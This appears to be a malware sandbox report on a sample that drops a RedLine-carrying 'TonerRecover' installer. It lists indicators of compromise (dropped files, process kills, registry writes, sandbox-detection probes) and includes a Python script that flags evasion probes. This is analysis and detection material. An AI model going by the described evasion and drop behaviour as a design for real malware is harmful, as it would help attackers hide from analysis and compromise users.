File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe | xqt8qLLHxSBbiug4VkrmvTGt.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg | xqt8qLLHxSBbiug4VkrmvTGt.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg | xqt8qLLHxSBbiug4VkrmvTGt.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe | wa5IqaoARMeCfzk5EGmIb5Jc.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat | wa5IqaoARMeCfzk5EGmIb5Jc.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe | wa5IqaoARMeCfzk5EGmIb5Jc.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe | wa5IqaoARMeCfzk5EGmIb5Jc.exe
File created | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini | wa5IqaoARMeCfzk5EGmIb5Jc.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe | xqt8qLLHxSBbiug4VkrmvTGt.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat | xqt8qLLHxSBbiug4VkrmvTGt.exe

The Updater.exe installed here is pid 4384 in the "Executes dropped EXE" list, and its memory dumps match the RedLine rules above, so the TonerRecover install is the RedLine carrier rather than a bystander application.

Drops file in Windows directory (4 IoCs)

description | ioc | Process
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | WerFault.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\winnetdriv.exe | explorer.exe
File opened for modification | C:\Windows\winnetdriv.exe | explorer.exe

The explorer.exe writing winnetdriv.exe is one of the dropped explorer.exe copies (pids 3660 and 4284), not the shell; winnetdriv.exe itself then runs as pid 4584.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (17 IoCs)

pid | pid_target | Process | procid_target
4252 | 4812 | WerFault.exe | 108
4740 | 4368 | WerFault.exe | 103
2288 | 4368 | WerFault.exe | 103
4412 | 4368 | WerFault.exe | 103
4300 | 4368 | WerFault.exe | 103
4272 | 4368 | WerFault.exe | 103
4260 | 4368 | WerFault.exe | 103
4724 | 6188 | WerFault.exe | 187
6184 | 6188 | WerFault.exe | 187
6964 | 7160 | WerFault.exe | 212
7012 | 6188 | WerFault.exe | 187
6008 | 7160 | WerFault.exe | 212
3956 | 7160 | WerFault.exe | 212
804 | 6188 | WerFault.exe | 187
6360 | 7076 | WerFault.exe | 210
6532 | 7160 | WerFault.ex e | 212
5708 | 7160 | WerFault.exe | 212
Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
SCSI information is often read in order to detect sandboxing environments.

All 12 operations target \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI:

Process | Key opened | Key enumerated | Key queried
sonia_2.exe | 1 | 1 | 1
huratfj | 3 | 3 | 3

Checks processor information in registry (2 TTPs, 18 IoCs)
Processor information is often read in order to detect sandboxing environments.

Each process below opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 and queried one value under it:

Process | value queried
svchost.exe | ~MHz
sonia_3.exe | ProcessorNameString
dKY998s5SPzWwNMcYpaw6yUY.exe | ProcessorNameString
KaN4oxVdNgcWXHg7_Sl3FY8D.exe | ProcessorNameString
ies6fl_0TmfCmYRE5wqrEm57.exe | ProcessorNameString
D880.exe | ProcessorNameString
build2.exe | ProcessorNameString
kGPLQ7M8fqAHElYq3fSV5UnL.exe | ProcessorNameString
pADyznAja7hNAcn0P3Ium4B3.exe | ProcessorNameString

Reading the CPU name is common in benign installers as well, so on its own it is a weak signal; the firmware-version and SCSI enumeration reads above are far more specific to VM detection.
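The BIOS, computer-location, SCSI and processor signatures above are all the same row shape ("Key ... queried/opened/enumerated", a registry path, a process name), so one small classifier can turn them into a per-process picture of which probes each payload made. The following is an added example written for this report, not sandbox code: REPORT_ROWS copies rows from those four signatures and from the EnableLUA table (the last row is a constructed benign control), while the category table and the scoring rule (firmware or disk probes count on their own, CPU only in combination) are assumptions for illustration.

```python
"""Classify registry probes from sandbox 'Key ... queried/opened' rows.

Added example for this report, not sandbox code. REPORT_ROWS are copied from
the BIOS, computer-location, SCSI, processor and EnableLUA rows above (the
last row is a constructed benign control); the category table and the
scoring rule are assumptions for illustration.
"""
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

OPS = ("Key value queried", "Key enumerated", "Key opened", "Key queried")

# Registry path fragment -> probe class (assumed table; each path should
# match exactly one entry).
CATEGORIES: List[Tuple[str, str]] = [
    (r"\HARDWARE\DESCRIPTION\System\SystemBiosVersion", "firmware"),
    (r"\HARDWARE\DESCRIPTION\System\VideoBiosVersion", "firmware"),
    (r"\HARDWARE\DESCRIPTION\System\CentralProcessor", "cpu"),
    (r"\ControlSet001\Enum\SCSI", "disk"),
    (r"\Control Panel\International\Geo\Nation", "geofence"),
    (r"\Policies\System\EnableLUA", "uac"),
]
# Firmware strings and disk enumeration are read almost only by VM checks;
# CPU name/speed is also read by benign installers, so it counts only in
# combination with another probe class.
STRONG_EVASION = {"firmware", "disk"}
WEAK_EVASION = {"cpu"}


def parse_row(row: str) -> Optional[Tuple[str, str, str]]:
    """Return (operation, path, process); the process is the last token,
    which lets paths with spaces ('Control Panel') survive."""
    for op in OPS:
        if row.startswith(op + " "):
            rest = row[len(op) + 1:].rstrip()
            path, _, proc = rest.rpartition(" ")
            if path.startswith("\\REGISTRY\\") and proc:
                return op, path, proc
    return None


def classify(path: str) -> Optional[str]:
    """Map a registry path to a probe class, or None if uninteresting."""
    low = path.casefold()
    for needle, category in CATEGORIES:
        if needle.casefold() in low:
            return category
    return None


def summarize(rows: List[str]) -> Dict[str, List[str]]:
    """process -> sorted probe classes it touched (uncategorised rows dropped)."""
    seen = defaultdict(set)
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        _, path, proc = parsed
        cat = classify(path)
        if cat:
            seen[proc].add(cat)
    return {p: sorted(c) for p, c in seen.items()}


def flag_evasion(summary: Dict[str, List[str]]) -> List[str]:
    """Processes with a strong probe, or at least two distinct probe classes."""
    out = []
    for proc, cats in summary.items():
        probes = (STRONG_EVASION | WEAK_EVASION) & set(cats)
        if probes & STRONG_EVASION or len(probes) >= 2:
            out.append(proc)
    return sorted(out)


REPORT_ROWS = [
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rJhZg0bwisK5bP7bLxUHp2lu.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rJhZg0bwisK5bP7bLxUHp2lu.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CF00.exe",
    r"Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CF00.exe",
    r"Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe",
    r"Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj",
    r"Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sonia_3.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sonia_3.exe",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe",
    r"Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation build2.exe",
    # Constructed control: an ordinary autorun lookup, no probe class.
    r"Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer.exe",
]

if __name__ == "__main__":
    summary = summarize(REPORT_ROWS)
    for proc, cats in sorted(summary.items()):
        print(f"{proc}: {', '.join(cats)}")
    print("likely sandbox evasion:", flag_evasion(summary))
```

With this rule build2.exe (geofence only) and sonia_3.exe (CPU only) are not flagged, which is the intended behaviour: a geofence is a targeting decision rather than a VM check, and a lone CPU-name read is too common in legitimate software to act on.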
Delays execution with timeout.exe (7 IoCs)

pid | Process
7260 | timeout.exe
7460 | timeout.exe
4628 | timeout.exe
6516 | timeout.exe
3516 | timeout.exe
7828 | timeout.exe
7960 | timeout.exe

Kills process with taskkill (7 IoCs)

pid | Process
8060 | taskkill.exe
5240 | taskkill.exe
7360 | taskkill.exe
4272 | taskkill.exe
1256 | taskkill.exe
7392 | taskkill.exe
7400 | taskkill.exe

Creates Internet Explorer settings key (3 IoCs)

description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Modifies data under HKEY_USERS (64 IoCs)

All 64 writes are under \REGISTRY\USER\.DEFAULT, the profile a process sees when it runs as SYSTEM or as a service, and come from 0IzhjBLGzhfJ1lBcluP4OBHg.exe, L_qUXI6RtLVPIQVw95aSnM00.exe and svchost.exe. Creating empty certificate-store keys and populating MuiCache with time-zone display names is typically a side effect of CryptoAPI and time-zone enumeration calls; on their own these rows are weak signals, but they do show that the two dropped executables were running in the SYSTEM context.

Certificate stores, Internet settings and language cache:

description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | L_qUXI6RtLVPIQVw95aSnM00.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | L_qUXI6RtLVPIQVw95aSnM00.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | L_qUXI6RtLVPIQVw95aSnM00.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | L_qUXI6RtLVPIQVw95aSnM00.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | L_qUXI6RtLVPIQVw95aSnM00.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | L_qUXI6RtLVPIQVw95aSnM00.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | L_qUXI6RtLVPIQVw95aSnM00.exe

Time-zone display strings, all "Set value (str)" under \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll:

resource id | value | Process
-434 | "Georgian Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-662 | "Cen. Australia Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2041 | "Eastern Daylight Time (Mexico)" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-191 | "Mountain Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-682 | "E. Australia Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-2062 | "North Korea Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2572 | "Turks and Caicos Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2371 | "Easter Island Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-1892 | "Russia TZ 3 Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2631 | "Norfolk Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-722 | "Central Pacific Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-2042 | "Eastern Standard Time (Mexico)" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-732 | "Fiji Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-1801 | "Line Islands Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-2182 | "Astrakhan Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-511 | "Central Asia Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-431 | "Iran Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-31 | "Mid-Atlantic Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-301 | "Romance Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2772 | "Omsk Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-212 | "Pacific Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-214 | "Pacific Daylight Time (Mexico)" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2391 | "Aleutian Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-402 | "Arabic Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2611 | "Bougainville Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-512 | "Central Asia Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-962 | "Paraguay Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-691 | "Tasmania Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-241 | "Samoa Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-52 | "Greenland Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-71 | "Newfoundland Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-382 | "South Africa Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-671 | "AUS Eastern Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-502 | "Nepal Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-2321 | "Sakhalin Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-331 | "E. Europe Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-831 | "SA Eastern Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-792 | "SA Western Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2141 | "Transbaikal Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-352 | "FLE Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-2341 | "Haiti Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2771 | "Omsk Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-1822 | "Russia TZ 1 Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-2511 | "Lord Howe Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-541 | "Myanmar Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-1501 | "Turkey Daylight Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
-2531 | "Chatham Islands Daylight Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-772 | "Montevideo Standard Time" | 0IzhjBLGzhfJ1lBcluP4OBHg.exe
-752 | "Tonga Standard Time" | L_qUXI6RtLVPIQVw95aSnM00.exe
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d3400dd74d7dd701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K} svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created 
\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S} svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1" MicrosoftEdge.exe Key created 
\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. 
= 010000003802ac211a7861526a623a556dbff3a978546bff4e91c981d7e64fb945c209c2009c6598c1ca6508740a1a516dbf4463af2c3c08006d27f56df5 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Process not Found Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000002d569c123d90bc5137def4d19600712f0575bd77c183054b821355213e30df6f1476068a86d0af7b2f3d06b27f839949060d177afc5af1c458af1cc523fd868b892e5367ce459f6f51fd36d193aedf66e966fd823f9ca4e7e09f MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local 
